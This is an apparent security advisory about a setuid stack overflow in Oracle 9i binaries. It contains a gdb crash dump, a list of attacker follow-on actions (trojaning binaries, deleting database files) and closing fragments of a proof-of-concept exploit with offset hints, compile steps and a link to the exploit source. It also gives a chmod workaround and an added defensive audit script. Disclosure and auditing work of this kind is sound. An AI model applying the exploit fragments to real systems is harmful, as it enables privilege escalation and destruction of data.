Oracle 9i installed on a Red Hat 9 x86 node with the latest Oracle patch kit (Release 2 Patch Set 3, version 9.2.0.4.0 for Linux) has a generic stack-based buffer overflow.
By passing a large argv[1] input string, one is able to overwrite the saved return address (EIP) with user-controlled data, resulting in a segmentation fault that can be controlled to allow the execution of arbitrary code.
These binaries are vulnerable to attack because they are installed with, or later given, the setuid (+s) bit. This allows users other than `oracle` to attach to restricted sections of the database, memory segments ....
All that is needed is shellcode that calls setreuid() with the oracle user ID on the vulnerable system, yielding the oracle user to the world.
By exploiting this basic bug, one is presented with the following options:
1) trojan oracle binaries
2) delete key database files
3) corrupt or modify data
4) shutdown abort the database
5) anything else the oracle user can do
The AIX build has also been tested and appears to be vulnerable to the same attack; I would guess that every other architecture is too.
If you run Oracle as root (I don't know why you would do such a thing) then you will lose your server; losing your database is not so bad??
#0  0x41414141 in ?? ()
(gdb) i r
eax            0x1d16       7446
ecx            0xbfffb5a8   -1073760856
edx            0x41414141   1094795585
ebx            0x41414141   1094795585
esp            0x41414141   0x41414141
ebp            0x41414141   0x41414141
esi            0x41414141   1094795585
edi            0x41414141   1094795585
eip            0x41414141   0x41414141
eflags         0x10202      66050
cs             0x23         35
....
A quick workaround is to remove the setuid (+s) flag from these binaries. This stops anyone gaining `oracle` access to the database via the method described here.
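The audit behind that workaround, as an added example that is not part of the advisory or of Oracle's tooling: a small POSIX shell script that lists the setuid/setgid executables under an Oracle home, counts them so a scheduled check can alert, and optionally strips the bit. The ORACLE_HOME default path is an assumption; adjust it for the real install.

```shell
#!/bin/sh
# Added example, not code from the advisory. Finds the setuid/setgid
# executables that let a local overflow in an Oracle binary become a
# jump to the oracle user, and optionally applies the advisory's
# "remove +s" workaround. The default ORACLE_HOME below is assumed.

# Print "perms owner group path" for each regular file under $1 that
# carries the setuid (4000) or setgid (2000) bit.
find_privileged_bins() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -ld {} \; 2>/dev/null |
        awk '{ print $1, $3, $4, $NF }'
}

# Number of hits, so a cron job or CI step can fail on a non-zero count.
count_privileged_bins() {
    find_privileged_bins "$1" | wc -l | tr -d ' '
}

# Strip setuid/setgid from every hit under $1. Check afterwards that the
# database still starts and that clients can still connect: some Oracle
# configurations rely on these bits, so rehearse this outside production.
strip_privileged_bits() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) \
        -exec chmod u-s,g-s {} \;
}

# When run directly: audit_oracle_suid.sh [ORACLE_HOME] [--fix]
if [ "${0##*/}" = "audit_oracle_suid.sh" ]; then
    home=${1:-${ORACLE_HOME:-/u01/app/oracle/product/9.2.0}}   # assumed path
    echo "[*] setuid/setgid executables under $home:"
    find_privileged_bins "$home"
    if [ "$2" = "--fix" ]; then
        strip_privileged_bits "$home"
        echo "[*] remaining after fix: $(count_privileged_bins "$home")"
    fi
fi
```

Run it against the real Oracle home before and after patching to confirm that only the binaries Oracle's own installation notes require still carry the bit.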
Since the ClearCase abuse information was not posted on all forums, I thought I would share this Oracle candy that I mentioned in that advisory. Here it is; c0ntex is still not full of hot air or false claims, this stuff is true, man.
Ok, no more jokes. I will not tease people with information about bugs without posting code to go with it, so I will not mention the issues with PHP, rlogin, the default Apache2 install and .. oops, I will not mention them until I am willing to share code. Relax, fella..! =|
Oracle was informed over a month ago and got back to me very quickly, but I have heard nowt since; he who delays is a shepherd's delight... If you get owned, blame them!
printf("[-] %s\n", VERSION);
printf("[-] -------------------------------------------------------\n"
       "[-] An offset value from 1750 - 3500 should work perfectly\n"
       "[-] if this does not nail it first time.\n"
       "[-] -------------------------------------------------------\n"
       "[-] Execute this PoC and attach ltrace with -o to a file so\n"
       "[-] you can grep for the goodness - c0ntex@hushmail.com\n"
       "[-] http://twistedminds.mine.nu/files/oracle_ownage.c\n"
       "[-] -------------------------------------------------------\n"
       "[-] gcc -Wall -o oracle_owned oracle_owned.c\n"
       "[-] Usage: %s offset_value\n", argv[0x00]);
for(i = 0x00; i < SMASHIT; i += 0x04) *(long *) &Bucket[i] = badd_addr;